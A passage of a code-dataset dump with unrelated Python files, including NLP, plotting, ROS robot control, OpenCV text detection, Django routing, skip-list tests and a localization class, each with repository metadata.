\"MD\" or pos_tag[0] == \"do\": # couldn't you do that?\n sentence = sentence.replace(\" \"+pos_tag[0]+\" \", \" can \", 1)\n pos_idx = pos_tag_list.index((pos_tag[0], pos_tag[1]))\n if pos_tag_list[pos_idx + 1][0] == \"not\":\n sentence = sentence.replace(\" not \", \" \", 1)\n if pos_tag_list[pos_idx + 1][0] == \"I\" or pos_tag_list[pos_idx + 2][0] == \"I\":\n sentence = sentence.replace(\" I \", \" you \", 1)\n break\n\n return 1, sentence\n\n elif is_command(sentence, nlp):\n return 2, sentence\n\n elif is_suggestion(pos_tag_list):\n for pos_tag in pos_tag_list:\n if pos_tag[1] == \"MD\":\n sentence = sentence.replace(pos_tag[0], \"should\", 1)\n break\n return 3, sentence\n\n elif is_desire(pos_tag_list):\n return 4, sentence\n\n else:\n return 5, sentence","sub_path":"chat_bot_server_dir/user_intent_classifier/sentence_type_finder.py","file_name":"sentence_type_finder.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"174380336","text":"HELP_STRING=\"\"\"\n\nDate : April 22,2021\n\nAuthor : Ruiyan Hou (ruiyan_hou@163.com)\n\nThis script will produce the figure 13 in the supplementary. \nScatter plot of the splicing efficiency estimated from different technique and predicted by three feature sets.\n\n\n\"\"\"\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestRegressor\nfrom hilearn import corr_plot\nimport numpy as np\nimport pylab as pl\nimport matplotlib.pyplot as plt\nfrom hilearn import CrossValidation, corr_plot\nimport seaborn as sns\n\nfig = plt.figure(figsize=(9.5,3.5))\n\n\n#panel 1\npl.subplot(1,2,1)\nfig=plt.gcf()\nelifedf=pd.read_csv('/home/lzbhouruiyan/scRNA-kinetics-prediction/elife/elife-45056-supp3-v2',delimiter='\\t')\nprint(elifedf.columns.tolist())\nelifedf['splicing_efficiency']=(elifedf['mean donor-bond and acceptor-bond half-life time [min]']/elifedf['junction half-life [min]']).apply(np.log)\nelifedf['gene_id']=elifedf['gene_id'].str.split('.',expand=True)[0]\nelifedf=elifedf[['gene_id','splicing_efficiency']]\nprint(elifedf)\npred_y=pd.read_csv('/home/lzbhouruiyan/pullgit/scRNA-kinetics-prediction/data/predicted/k562_bulk_with_label.csv')\nprint(pred_y)\nelifedf=elifedf.merge(pred_y,on='gene_id')\nelifedf.columns=['gene_id','observation','prediction']\nprint(elifedf)\ncorr_plot(elifedf['observation'].values,elifedf['prediction'].values,size=20,dot_color='tomato',alpha=0.8)\npl.xlabel(\"observation \",fontsize=9)\npl.ylabel(\"prediction\",fontsize=9)\npl.title('K562(TT-seq)',fontweight='medium',fontsize=12)\n\n\n#panel 2\nplt.subplot(1,2,2)\ninspectdf=pd.read_csv('/home/lzbhouruiyan/scRNA-kinetics-prediction/PTBP1/k562/inspect/splicing.csv',index_col=0)\ninspectdf=inspectdf[['ensembl','ctrl_m/p']]\ninspectdf.columns=['gene_id','observation']\ninspect_predict_y=pd.read_csv('/home/lzbhouruiyan/pullgit/scRNA-kinetics-prediction/data/predicted/k562_bulk_without_label.csv')\ninspectdf=inspectdf.merge(inspect_predict_y,on='gene_id')\ninspectdf.rename(columns={'0':'prediction'},inplace=True)\nprint(inspectdf)\ncorr_plot(inspectdf['observation'].apply(np.log).values,inspectdf['prediction'].values,size=20,dot_color='tomato',alpha=0.8)\npl.xlabel(\"observation \",fontsize=9)\npl.ylabel(\"prediction\",fontsize=9)\npl.title('K562(RNA-seq)',fontweight='medium',fontsize=12)\n\nfig.savefig('/home/lzbhouruiyan/scRNA-kinetics-prediction/figure/supp/S13.pdf')\n\n","sub_path":"notebooks/figure/FigS13.py","file_name":"FigS13.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"562088241","text":"from os import environ\n\nRABBITMQ_CONNECTION = environ[\"RABBITMQ_CONNECTION\"] if environ.get(\n \"RABBITMQ_CONNECTION\") else \"localhost\"\n\nMINIO_ACCESS_KEY = environ[\"MINIO_ACCESS_KEY\"] if environ.get(\n \"MINIO_ACCESS_KEY\") else \"Q3AM3UQ867SPQQA43P2F\"\nMINIO_SECRET_KEY = environ[\"MINIO_SECRET_KEY\"] if environ.get(\n \"MINIO_SECRET_KEY\") else \"zuf+tfteSlswRu7BJ86wekitnifILbZam1KYY3TG\"\nMINIO_URL = environ[\"MINIO_URL\"] if environ.get(\n \"MINIO_URL\") else \"play.min.io:9000\"\nMINIO_BUCKET = environ[\"MINIO_BUCKET\"] if environ.get(\n \"MINIO_BUCKET\") else \"brains\"\n\nMONGO_URL = environ[\"MONGO_URL\"] if environ.get(\"MONGO_URL\") else \"mongodb://localhost:27017\" \nMONGO_DB = environ[\"MONGO_DB\"] if environ.get(\"MONGO_DB\") else \"logsDB\"\nMONGO_COLLECTION = environ[\"MONGO_COLLECTION\"] if environ.get(\"MONGO_COLLECTION\") else \"creator\"\n\n\nQUEUE = {\n \"from_client\" : \"from_client\",\n \"from_preprocessor\" : \"from_preprocessor\",\n \"from_creator\" : \"from_creator\",\n \"from_deployer\" : \"from_deployer\"\n}\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"13755904","text":"import torch\nimport pickle\nimport sys\nimport nltk\nfrom os.path import dirname, abspath, join, exists\n\nfrom qanta.guesser_model import Model\n\nMODEL_PATH = join(dirname(abspath(__file__)), 'dan_bias.pt')\nIND_LABEL_PATH = join(dirname(abspath(__file__)), 'word_maps.pkl')\nkUNK = ''\nkPAD = ''\n# arbitrary, temp buzzer\n# BUZZ_THRESHOLD = 0.01\nBUZZ_THRESHOLD = -200\n\nassert exists(MODEL_PATH)\nassert exists(IND_LABEL_PATH)\n\n# how to load model & data so it's initialized once?\n\n\n\ndef vectorize(word2index, tokenized_text):\n\treturn [word2index[word] if word in word2index else word2index[kUNK] for word in tokenized_text]\n\n\nclass Guesser:\n\tdef __init__(self):\n\t\tself.model = torch.load(MODEL_PATH, map_location='cpu')\n\t\twith open(IND_LABEL_PATH, 'rb') as f:\n\t\t\tself.ind_and_labels = pickle.load(f)\n\t\tself.word2index = self.ind_and_labels['word2index']\n\t\tself.index2class = self.ind_and_labels['index2class']\n\n\tdef guess_and_buzz(self, question):\n\t\ttokens = nltk.word_tokenize(question)\n\t\tvectorized = vectorize(self.word2index, tokens)\n\n\t\tinput_text = torch.Tensor([vectorized])\n\t\ttext_length = torch.Tensor([len(vectorized)])\n\t\tlogits = self.model(input_text, text_length)\n\n\t\ttop_n, top_i = logits.topk(5)\n\t\t# print(top_n, top_i, file=sys.stderr)\n\t\t# print('\\n', file=sys.stderr)\n\t\tbuzz = False\n\t\tif top_n[0][0].item() > BUZZ_THRESHOLD:\n\t\t\tbuzz = True\n\t\treturn self.index2class[top_i[0][0].item()], buzz\n\n\tdef batch_guess_and_buzz(self, questions):\n\t\treturn [self.guess_and_buzz(question) for question in questions]\n\n\tdef train(self, save=True):\n\t\tpass\n","sub_path":"src/qanta/guesser.py","file_name":"guesser.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"641348886","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys;\nfrom selenium.webdriver.chrome.options import Options;\n\noptions = Options()\noptions.add_argument(\"--headless\");\n\ndriver1 = webdriver.Chrome(options=options);\n\ndriver1.get(\"https://www.indeed.com/\");\nprint(\"Got Indeed.com\");\ndriver1SessionId = driver1.session_id;\nprint(\"The session id of driver 1 is \");\nprint(driver1SessionId);\nprint(\"\\n\");\n\ndriver1.get(\"https://www.glassdoor.com/\");\nprint(\"Got Glassdoor.com\");\n\n\"\"\"\ndriver2 = webdriver.Chrome(options=options);\ndriver2.session_id = driver1SessionId;\nprint(\"The session id of driver 2 is \");\nprint(driver2.session_id);\n\"\"\"\n","sub_path":"indeed-data/testmultiple.py","file_name":"testmultiple.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"222968074","text":"import cv2\nfrom sklearn.externals import joblib\nimport numpy as np\n\n\nmodel = joblib.load(\"digits.pkl\")\n\ncap = cv2.VideoCapture(0)\n\n# Check if the webcam is opened correctly\nif not cap.isOpened():\n raise IOError(\"Cannot open webcam\")\nwhile True:\n ret, frame = cap.read()\n\n grayFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n grayFrame = cv2.GaussianBlur(grayFrame, (5, 5), 0)\n _, fr_th = cv2.threshold(grayFrame, 155, 255, cv2.THRESH_BINARY_INV)\n _, ctrs, _ = cv2.findContours(\n fr_th, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n rects = [cv2.boundingRect(ctr) for ctr in ctrs]\n for rect in rects:\n # cat ra hinh anh moi so\n # dua ve hinh nah 28x28\n\n leng = int(rect[3]*1.6)\n pt1 = int(rect[1] + rect[3] // 2 - leng // 2)\n pt2 = int(rect[0] + rect[2] // 2 - leng // 2)\n\n roi = fr_th[pt1:pt1 + leng, pt2:pt2 + leng]\n roi = cv2.resize(roi, (28, 28), interpolation=cv2.INTER_AREA)\n roi = cv2.dilate(roi, (3, 3))\n number = np.array([roi]).reshape(1, 28*28)\n predict = model.predict(number)\n\n print(predict)\n\n cv2.imshow('video', frame)\n\n c = cv2.waitKey(1)\n if c == 13:\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"hand-digit-logis.py","file_name":"hand-digit-logis.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"386897432","text":"#!/usr/bin/env python2\n\nimport rospy\nimport math\nfrom nav_msgs.msg import Odometry, Path\nfrom geometry_msgs.msg import PoseStamped\nfrom geometry_msgs.msg import Twist\nfrom tf.transformations import euler_from_quaternion\n\n\nclass Lab2:\n\n def __init__(self):\n \"\"\"\n Class constructor\n \"\"\"\n self.px = 0\n self.py = 0\n self.pth = 0\n\n # Initialize node, name it 'path_executor'\n rospy.init_node(\"path_executor\")\n # Tell ROS that this node publishes Twist messages on the '/cmd_vel' topic\n self.cmd_vel = rospy.Publisher('/cmd_vel', Twist, queue_size=10)\n # Tell ROS that this node subscribes to Odometry messages on the '/odom' topic\n # When a message is received, call self.update_odometry\n rospy.Subscriber('/odom', Odometry, self.update_odometry)\n # Create a new service called \"execute_path\" that accepts messages of\n # type Plan and calls self.execute_planned_path() when a message is received\n rospy.Service('execute_path', Path, self.go_to)\n\n rospy.sleep(5)\n\n def send_speed(self, linear_speed, angular_speed):\n \"\"\"\n Sends the speeds to the motors.\n :param linear_speed [float] [m/s] The forward linear speed.\n :param angular_speed [float] [rad/s] The angular speed for rotating around the body center.\n \"\"\"\n\n # Make a new Twist message\n msg_cmd_vel = Twist()\n # Linear\n msg_cmd_vel.linear.x = linear_speed\n msg_cmd_vel.linear.y = 0.0\n msg_cmd_vel.linear.z = 0.0\n # Angular velocity\n msg_cmd_vel.angular.x = 0.0\n msg_cmd_vel.angular.y = 0.0\n msg_cmd_vel.angular.z = angular_speed\n # Publish the message\n self.cmd_vel.publish(msg_cmd_vel)\n\n def drive(self, distance, linear_speed):\n \"\"\"\n Drives the robot in a straight line.\n :param distance [float] [m] The distance to cover.\n :param linear_speed [float] [m/s] The forward linear speed.\n \"\"\"\n\n init_x = self.px\n init_y = self.py\n distance_traveled = 0\n threshold = .05\n\n self.send_speed(linear_speed, 0)\n\n while (distance - distance_traveled) > threshold:\n distance_traveled = math.sqrt((self.px - init_x)**2 + (self.py - init_y)**2)\n rospy.sleep(.050)\n\n self.send_speed(0, 0)\n\n def rotate(self, angle, aspeed):\n \"\"\"\n Rotates the robot around the body center by the given angle.\n :param angle [float] [rad] The distance to cover.\n :param aspeed [float] [rad/s] The angular speed.\n \"\"\"\n current_angle = self.pth\n goal_angle = current_angle + angle\n threshold = .01\n\n if angle < 0:\n aspeed = -aspeed\n\n self.send_speed(0, aspeed)\n\n while abs(goal_angle - current_angle) > threshold:\n current_angle = self.pth\n rospy.sleep(.050)\n\n self.send_speed(0, 0)\n\n def execute_planned_path(self,msg):\n #rospy.ServiceProxy()\n path_now = msg.plan.poses.reverse()\n for requestedPose in path_now.plan.poses:\n self.go_to(requestedPose)\n\n def go_to(self, msg):\n \"\"\"\n Calls rotate(), drive(), and rotate() to attain a given pose.\n This method is a callback bound to a Subscriber.\n :param msg [PoseStamped] The target pose.\n \"\"\"\n current_x = self.px\n current_y = self.py\n current_angle = self.pth\n\n delta_x = msg.pose.position.x - current_x\n delta_y = msg.pose.position.y - current_y\n delta_theta = math.atan2(delta_y, delta_x) - current_angle\n\n self.rotate(delta_theta, 0.25)\n self.drive(math.sqrt(delta_x * delta_x + delta_y * delta_y), 0.1)\n\n def update_odometry(self, msg):\n \"\"\"\n Updates the current pose of the robot.\n This method is a callback bound to a Subscriber.\n :param msg [Odometry] The current odometry information.\n \"\"\"\n\n self.px = msg.pose.pose.position.x\n self.py = msg.pose.pose.position.y\n quat_orig = msg.pose.pose.orientation\n quat_list = [quat_orig.x, quat_orig.y, quat_orig.z, quat_orig.w]\n (roll, pitch, yaw) = euler_from_quaternion(quat_list)\n self.pth = yaw\n\n def run(self):\n rospy.spin()\n\n\nif __name__ == '__main__':\n Lab2().run()\n","sub_path":"RBE3002_turtle01-master/RBE3002_turtle01-master/RBE3002_template/src/execute_path.py","file_name":"execute_path.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"202149930","text":"import tkinter as obj\nfrom tkinter import ttk\nwin=obj.Tk()\nwin.title(\"Loop widgets\")\nlabels=['Name','Class','City','NO']\nfor item in range(len(labels)):\n lable='Lables'+str(item)\n ttk.Label(win,text=labels[item]).grid(row=item,column=0,sticky=obj.W)\nentry_box={\n 'Name':obj.StringVar(),\n 'Class':obj.StringVar(),\n 'City':obj.StringVar(),\n 'No':obj.StringVar()\n}\ncounter=0\nfor i in entry_box:\n variableC=\"entryVar\"+i\n ttk.Entry(win,width=16,textvariable=entry_box[i]).grid(row=counter,column=1)\n counter+=1\ndef action():\n for v in entry_box:\n print(entry_box[v].get())\nttk.Button(win,text='Submit',command=action).grid(row=6,column=1)\n\nwin.mainloop()","sub_path":"tkinter GUI Mudule/WidgetsYsingLoop.py","file_name":"WidgetsYsingLoop.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"419503329","text":"import cv2\nimport click\nimport numpy\nfrom imutils.object_detection import non_max_suppression\n\n\ndef find_text(image, newW=320, newH=320, min_confidence=0.5):\n\tclone = image.copy()\n\n\t# grab the image dimensions\n\t(H, W) = clone.shape[:2]\n\n\t# set the new width and height and then determine the ratio in change for both the width and height\n\trW = W / float(newW)\n\trH = H / float(newH)\n\n\t# resize the image and grab the new image dimensions\n\tclone = cv2.resize(clone, (newW, newH))\n\n\t# define the two output layer names for the EAST detector model that we are interested -- the first is the output probabilities and the second can be used to derive the bounding box coordinates of text\n\tlayerNames = [\"feature_fusion/Conv_7/Sigmoid\", \"feature_fusion/concat_3\"]\n\n\t# load the input image and grab the image dimensions\n\t(H, W) = clone.shape[:2]\n\n\t# construct a blob from the image and then perform a forward pass of the model to obtain the two output layer sets\n\tblob = cv2.dnn.blobFromImage(clone, 1.0, (W, H), (123.68, 116.78, 103.94), swapRB=True, crop=False)\n\tnet.setInput(blob)\n\t(scores, geometry) = net.forward(layerNames)\n\n\t# grab the number of rows and columns from the scores volume, then initialize our set of bounding box rectangles and corresponding confidence scores\n\t(numRows, numCols) = scores.shape[2:4]\n\trects = []\n\tconfidences = []\n\n\t# loop over the number of rows\n\tfor y in range(0, numRows):\n\t\t# extract the scores (probabilities), followed by the geometrical data used to derive potential bounding box coordinates that surround text\n\t\tscoresData = scores[0, 0, y]\n\t\txData0 = geometry[0, 0, y]\n\t\txData1 = geometry[0, 1, y]\n\t\txData2 = geometry[0, 2, y]\n\t\txData3 = geometry[0, 3, y]\n\t\tanglesData = geometry[0, 4, y]\n\n\t\t# loop over the number of columns\n\t\tfor x in range(0, numCols):\n\t\t\t# if our score does not have sufficient probability, ignore it\n\t\t\tif scoresData[x] < min_confidence:\n\t\t\t\tcontinue\n\n\t\t\t# compute the offset factor as our resulting feature maps will be 4x smaller than the input image\n\t\t\t(offsetX, offsetY) = (x * 4.0, y * 4.0)\n\n\t\t\t# extract the rotation angle for the prediction and then compute the sin and cosine\n\t\t\tangle = anglesData[x]\n\t\t\tcos = numpy.cos(angle)\n\t\t\tsin = numpy.sin(angle)\n\n\t\t\t# use the geometry volume to derive the width and height of the bounding box\n\t\t\th = xData0[x] + xData2[x]\n\t\t\tw = xData1[x] + xData3[x]\n\n\t\t\t# compute both the starting and ending (x, y)-coordinates for the text prediction bounding box\n\t\t\tendX = int(offsetX + (cos * xData1[x]) + (sin * xData2[x]))\n\t\t\tendY = int(offsetY - (sin * xData1[x]) + (cos * xData2[x]))\n\t\t\tstartX = int(endX - w)\n\t\t\tstartY = int(endY - h)\n\n\t\t\t# add the bounding box coordinates and probability score to our respective lists\n\t\t\trects.append((startX, startY, endX, endY))\n\t\t\tconfidences.append(scoresData[x])\n\n\t# apply non-maxima suppression to suppress weak, overlapping bounding boxes\n\tboxes = non_max_suppression(numpy.array(rects), probs=confidences)\n\n\t# loop over the bounding boxes\n\tfor (startX, startY, endX, endY) in boxes:\n\t\t# scale the bounding box coordinates based on the respective ratios\n\t\tstartX = int(startX * rW)\n\t\tstartY = int(startY * rH)\n\t\tendX = int(endX * rW)\n\t\tendY = int(endY * rH)\n\n\t\t# draw the bounding box on the image\n\t\tcv2.rectangle(image, (startX, startY), (endX, endY), (0, 255, 0), 2)\n\n\ndef process_stream(source, flip=False):\n\t# capture the webcam\n\tcapture = cv2.VideoCapture(source)\n\n\t# Capture the first\n\tret, frame = capture.read()\n\n\t# keep on reading each frame from the webcam \n\twhile(ret):\n\t\t# flip frame horizontal\n\t\tif flip:\n\t\t\tframe = cv2.flip(frame, 1)\n\n\t\t# find the text in the given image\n\t\tfind_text(frame)\n\n\t\t# Display the resulting frame\n\t\tcv2.imshow('Stream', frame)\n\n\t\t# press ESC to quit\n\t\tif cv2.waitKey(33) == 27:\n\t\t\tbreak\n\n\t\t# Capture the next frame\n\t\tret, frame = capture.read()\n\n\ndef process_image(file):\n\t# read the image\n\timage = cv2.imread(file)\n\n\t# find the text in the given image\n\tfind_text(image)\n\n\t# Display the resulting image\n\tcv2.imshow('Image', image)\n\n\t# press ESC to quit\n\tcv2.waitKey(0)\n\n\n@click.command()\n@click.option('--source', prompt='Which source', default='webcam', type=click.Choice(['webcam', 'image', 'video']), help='What kind of source are you using?')\n@click.option('--file', prompt='Which file', default='', help='Only applies for images and videos.')\ndef main(source, file):\n\n\tif source == 'webcam':\n\t\tprocess_stream(0, flip=True)\n\n\tif source == 'video':\n\t\tprocess_stream(file)\n\n\tif source == 'image':\n\t\tprocess_image(file)\n\n\nif __name__ == '__main__':\n\t# load the pre-trained EAST text detector\n\tnet = cv2.dnn.readNet('frozen_east_text_detection.pb')\n\n\tmain()\n\n# When everything done, release the capture\ncapture.release()\ncv2.destroyAllWindows()","sub_path":"examples/python/text_detection/text_detection.py","file_name":"text_detection.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"29144506","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCriado em 12 de Março de 2017 às 18:56:12 2017 - Domingo\n@author: Marllon Soares\n@site: www.marllonsoares.com.br\n@linguagem: Python 3\n@assunto: URI Online Judge | 1259 - PARES E ÍMPARES\n@problema: Por Neilor Tonin, URI Brasil\n@Timelimit: 1\n@link: https://www.urionlinejudge.com.br/judge/pt/problems/view/1259\n\"\"\"\n\n# FUNÇÃO PARA MOSTRAR A LISTA NA TELA\ndef mostraLista(lista):\n for i in range(len(lista)):\n print(lista[i])\n\nn = int(input()) # RECEBE A QUANTIDADE DE CASOS DE TESTES\npares = [] # CRIA UMA LISTA PARA ARMAZENAR O VALORES PARES\nimpares = [] # CRIA UMA LISTA PARA ARMAZENAR O VALORES IMPARES\n\n# INICIA OS CASOS DE TESTES\nfor i in range(n):\n numero = int(input())\n if numero % 2 == 0: # VERIFICA SE O NÚMERO É PAR\n pares.append(numero) # ARMAZENA O NÚMERO NO VETOR DE PARES\n else: # SE NÃO FOR PAR\n impares.append(numero) # ARMAZENA O NÚMERO NO VETOR DE IMPARES\n\n# ORDENA AS LISTAS / VETORES\npares.sort() # ORDENA O VETOR DE PARES DE FORMA CRESCENTE\nimpares.sort(reverse=True) # ORDENA O VETOR DE IMPARES DE FORMA DECRESCENTE\n\nmostraLista(pares) # MOSTRA O VETOR DE PARES ORDENADO\nmostraLista(impares) # MOSTRA O VETOR DE IMPARES ORDENADO\n","sub_path":"URI-1259/URI-1259-PARES-E-IMPARES.py","file_name":"URI-1259-PARES-E-IMPARES.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"221896278","text":"import requests\nimport re\nheaders={\n 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'\n }\nr=requests.get('http://top.baidu.com/category?c=12',headers=headers)\nr.encoding='GBK'\npattern=re.compile('.*?<.*?href_top.*?>(.*?)<',re.S)\ntitles=re.findall(pattern,r.text)\nfor i in titles:\n print(i)\nprint(r.cookies)\nfor key,value in r.cookies.items():\n print(key + '=' + value)\n","sub_path":"baiduPopularSearch.py","file_name":"baiduPopularSearch.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"536196848","text":"# -*- coding: utf8 -*-\nfrom django.conf.urls import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nfrom nm_admin_panel.admin import admin_site\nfrom nm_admin_panel.views import Creator, Viewer, Editor, ChooseAction, RunOrTestDelivery, Maillist, Delivery\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.auth import views as auth_views\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'nm_admin.views.home', name='home'),\n # url(r'^nm_admin/', include('nm_admin.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n # url(r'^nm_admin/', include(admin_site.urls)),\n)\n\n# login and logout\nurlpatterns += patterns('django.contrib.auth.views',\n url(r'^accounts/login/$', auth_views.login,\n {'template_name': 'admin/login.html'}, name='mrulogin'),\n url(r'^logout/?$',\n auth_views.logout, name='logout', kwargs={'next_page': '/'}),\n )\n\nurlpatterns += patterns('nm_admin_panel.views',\n url(r'^$', 'index_page', name=\"index\"),\n url(r'^create/?$', login_required(Creator.as_view()), name='create_new'),\n url(r'^list/?$', login_required(Viewer.as_view()), name=\"template_list\"),\n url(r'^edit/(?P\\d+)?$', login_required(Editor.as_view()), name=\"template_edit\"),\n url(r'^action/(?P\\d+)?$', login_required(ChooseAction.as_view()), name=\"choose_action\"),\n url(r'^maillist/?$', login_required(Maillist.as_view()), name=\"maillist\"),\n url(r'^launch_delivery/(?P\\d+)?$', login_required(RunOrTestDelivery.as_view()), name='launch_delivery'),\n url(r'^delivery/(?P\\d+)?$', login_required(Delivery.as_view()), name=\"delivery\"),\n )\n\nurlpatterns += staticfiles_urlpatterns()","sub_path":"hostcomm-mru/nm_admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"101392573","text":"import unittest\nimport logging\nimport random\nfrom skiplist_no_log import SkipList\n\n \nclass SkipListTestCase(unittest.TestCase):\n MIN_NODES_TO_INSERT = 5\n MAX_NODES_TO_INSERT = 20\n MAX_LEVEL = 5\n P = 0.5\n\n def setUp(self):\n self.sl = SkipList(self.P, self.MAX_LEVEL)\n\n\n def test_init(self):\n log = logging.getLogger(\"SkipListTestCase.test_init\" )\n self.assertEqual(self.sl.level, 0)\n self.assertEqual(len(self.sl.HEADER.forward), self.sl.maxLevel)\n self.assertEqual(len(self.sl.NIL.forward), 0)\n\n #Note: could fail in case 2 nodes with same key will be generated\n def test_first_level_has_all_nodes_after_insert(self):\n log = logging.getLogger(\"SkipListTestCase.test_first_level_has_all_nodes_after_insert\" )\n n_of_nodes = random.randint(self.MIN_NODES_TO_INSERT, self.MAX_NODES_TO_INSERT)\n log.debug(\"Number of nodes to insert = %s\", n_of_nodes)\n for i in range(n_of_nodes):\n key = random.randint(self.sl.MIN_KEY_VALUE, self.sl.MAX_KEY_VALUE)\n value = random.randint(0, 99999)\n self.sl.insert(key, value)\n \n log.debug(self.sl.level_to_string(0))\n for n in self.sl.get_nodes_of_level(0):\n log.debug(n.key)\n # We have to take into account also header and nil node\n self.assertEqual(len(self.sl.get_nodes_of_level(0)), n_of_nodes + 2 )\n\n def test_search(self):\n log = logging.getLogger(\"SkipListTestCase.test_search\" )\n n_of_nodes = random.randint(5, 6)\n log.debug(\"Number of nodes to insert = %s\", n_of_nodes)\n node_to_search = random.randrange(0, n_of_nodes)\n log.debug(\"Among all generated nodes, we'll search the %s-th generated\",\n node_to_search)\n\n for i in range(n_of_nodes):\n key = random.randint(self.sl.MIN_KEY_VALUE, self.sl.MAX_KEY_VALUE)\n value = random.randint(0, 99999)\n self.sl.insert(key, value)\n if i == node_to_search:\n search_key = key\n search_value = value\n log.debug(\"Node to search has key = %s and value = %s\", \n key, value )\n log.debug(self.sl.list_to_string())\n found_value = self.sl.search(search_key)\n log.debug(\"Found value = %s\", found_value)\n self.assertEqual(found_value, search_value)\n\n \n \nif __name__ == '__main__':\n logging.basicConfig(filename='testsuite.log', filemode='w', level=logging.DEBUG)\n logging.getLogger(\"SkipListTestCase.test_init\").setLevel(logging.ERROR)\n logging.getLogger(\"SkipListTestCase.test_first_level_has_all_nodes_after_insert\").setLevel(logging.ERROR)\n logging.getLogger(\"SkipListTestCase.test_search\").setLevel(logging.ERROR)\n unittest.main() \n","sub_path":"Python/testsuite.py","file_name":"testsuite.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"378516803","text":"#!/usr/bin/python3\n#date: 08/10/2020\nddd = [61, 71, 11, 21, 32, 19, 27, 31]\ndestination = [\"Brasilia\", \"Salvador\", \"Sao Paulo\", \"Rio de Janeiro\", \"Juiz de Fora\", \"Campinas\", \"Vitoria\", \"Belo Horizonte\"]\n\ncode_number = int(input())\nsomatorio = 0\n\nfor item in ddd:\n\tsomatorio += 1\n\nif code_number in ddd:\n\tfor item in range(somatorio-1):\n\t\tif code_number\t== ddd[item]:\n\t\t\tprint(destination[item])\nelse:\n\tprint(\"DDD nao cadastrado\")","sub_path":"P1/1050.py","file_name":"1050.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"496252403","text":"####################### EXTERNAL IMPORTS ###################################\nfrom keras.layers import Conv2D, MaxPool2D, Dense, Dropout, Flatten\nfrom keras.models import Sequential, load_model\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport time\nimport matplotlib.pyplot as plt\n############################################################################\n\n####################### INTERNAL IMPORTS ###################################\nfrom Utility import rotate_image, pair_pixels, brief_encode\nfrom Utility import calc_weight_brief, calc_weight_sse, calc_weight_cossim\nfrom DataProcessor import *\nfrom VisualOdometry import *\nfrom ParticleFilter import *\n############################################################################\n\n\nclass Localizer:\n\t'''Full localization solution, with various performance assessment functions.\n\t Mostly centered around terrain classification. Does not work properly yet.'''\n\n\tdef __init__(self, map_file, camera_path, weights_file, frames, num_particles=1000):\n\t\t'''\n\t\tInitialize Localizer object.\n\t\tArgs:\n\t\t\t map_file: path to file of the global map to use\n\t\t\t camera_path: path to camera images taken during the flight\n\t\t weights_file: path to weights file to use learning model with\n\t\t\t\t frames: total count of images taken during the flight\n\t\t'''\n\t\tself._set_processor(map_file=map_file,\n\t\t\t\t\t\t\tcamera_path=camera_path,\n\t\t\t\t\t\t\tweights_file=weights_file)\n\n\t\tself._set_filter(x_range=(600, 4200), y_range=(600, 4200), z_range=(30,150), N=num_particles)\n\n\t\tself._set_odometry(camera_path=camera_path, last_frame=frames)\n\n\n\t# ------------------------ OBJECT SETTERS/GETTERS ------------------------#\n\tdef _set_processor(self, map_file, camera_path, weights_file):\n\t\tself.processor = DataProcessor(map_file, camera_path, weights_file)\n\n\tdef get_processor(self):\n\t\treturn self.processor\n\n\tdef _set_filter(self, x_range, y_range, z_range, N):\n\t\tself.filter = ParticleFilter(x_range, y_range, z_range, N)\n\n\tdef get_filter(self):\n\t\treturn self.filter\n\n\tdef _set_odometry(self, camera_path, last_frame):\n\t\tself.odometry = VisualOdometry(camera_path, last_frame)\n\n\tdef get_odometry(self):\n\t\treturn self.odometry\n\t# 